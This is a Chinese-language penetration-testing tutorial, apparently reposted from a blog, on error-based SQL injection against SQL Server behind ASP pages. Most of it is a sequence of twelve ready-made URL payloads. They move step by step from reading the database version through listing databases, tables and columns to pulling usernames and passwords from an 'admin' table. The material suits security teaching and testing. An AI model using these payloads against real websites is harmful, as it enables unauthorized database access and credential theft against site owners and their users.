72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、SQLSERVER+ASP 报错注入

1、sql server的报错页面

(1)背景:在语句执行时发生错误会报出错误,并且会在网页上显示出来。 (2)环境:sql server2008+aspx (4)原理:利用mssql在类型转换失败时的报错,显示其相应的信息!!! (3)限制:一次只能爆出一个字段。

2、SQLSERVER+ASP 报错注入示例

(1)爆出数据库版本:?id=1 and @@version>0 img

(2)爆出数据库:?id=1 and db_name()>0 img

(3)爆当前用户:?id=1 and User_Name()>0 img

(4)爆出其他数据库:?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0 img

(5)爆出其他数据库(排除master数据库):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 img

(6)爆出其他数据库(排除master和iNetinkCMS):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS'))>0 img

(7)爆当前数据库的表:?id=1 and (select top 1 name from [mydb].sys.all_objects where type='U' AND is_ms_shipped=0)>0 img

(8)爆出其他表(排除cmd):?id=1 and (select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0 img

(9)爆出列:?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin')>0 img

(10)爆出其他列(排除id):?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID'))>0 img

(11)爆出数据(username):?id=1 and (select top 1 username from admin)>0 img

(12)爆出数据(password):?id=1 and (select top 1 password from admin)>0 img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/122568900
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复